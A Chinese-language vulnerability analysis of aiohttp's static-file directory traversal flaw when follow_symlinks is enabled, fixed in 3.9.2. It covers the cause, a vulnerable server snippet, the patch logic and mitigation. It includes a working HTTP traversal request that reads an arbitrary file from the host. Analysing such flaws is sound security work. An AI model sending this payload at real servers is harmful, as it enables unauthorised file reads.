漏洞描述：

aiohttp 是一个用于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。使用aiohttp作为Web服务器并配置静态路由时，需要指定静态文件的根路径。此外，选项“follow_symlinks”可用于确定是否遵循静态根目录之外的符号链接。当“follow_symlinks”设置为 True 时，不会进行验证来检查读取的文件是否位于根目录内。这可能会导致目录遍历漏洞，从而导致对系统上的任意文件进行未经授权的访问，即使符号链接不存在也是如此。鼓励缓解措施是禁用 follow_symlinks 并使用反向代理。版本 3.9.2 修复了此问题。

服务启动Py文件中有"/static", “static/” 其中一个是涉及现有目录，没有自行创建一个，不然可能会报错

from aiohttp import webasync def index(request):return web.Response(text="Hello, World!")app = web.Application()
app.router.add_routes([web.static("/static", "static/", follow_symlinks=True),
])
app.router.add_get('/', index)if __name__ == '__main__':web.run_app(app, host='127.0.0.1', port=9999)

GET /static/../../../../D:\\6666.txt HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

漏洞原因

在使用 aiohttp 作为 Web 服务器时，错误配置静态资源解析可能导致目录遍历漏洞，允许攻击者未经授权读取系统上的任意文件。该漏洞的根本问题在于静态路由配置中的 follow_symlinks 选项，当设置为 True 时，可能绕过验证，使得符号链接可以指向根目录之外的文件，导致安全漏洞。

app.router.add_routes([web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
])

补丁分析

通过官方项目发布补丁情况

• 路径处理逻辑： 使用 normalized_path对未解析的路径进行规范化处理，消除冗余的分隔符和相对路径。然后再尝试将规范化的路径转换为相对于指定目录的相对路径，最后解析为绝对路径。
• 符号链接处理： 根据 follow_symlinks
  的设置，决定是否遵循符号链接。如果需要遵循，则使用规范化的路径，否则直接使用未解析的路径。
• 异常处理： 在捕获到可能的异常时，如 ValueError 或 FileNotFoundError，同样触发了适当的错误处理，即抛出 HTTPForbidden 异常。

结束语

从启用 follow_symlinks 选项并且路径指向符号链接时发生目录遍历漏洞。通过补丁改进，补丁代码确保了在处理静态资源时，即使路径指向符号链接，也能正确地验证路径是否在指定的根目录内，从而防止了目录遍历漏洞。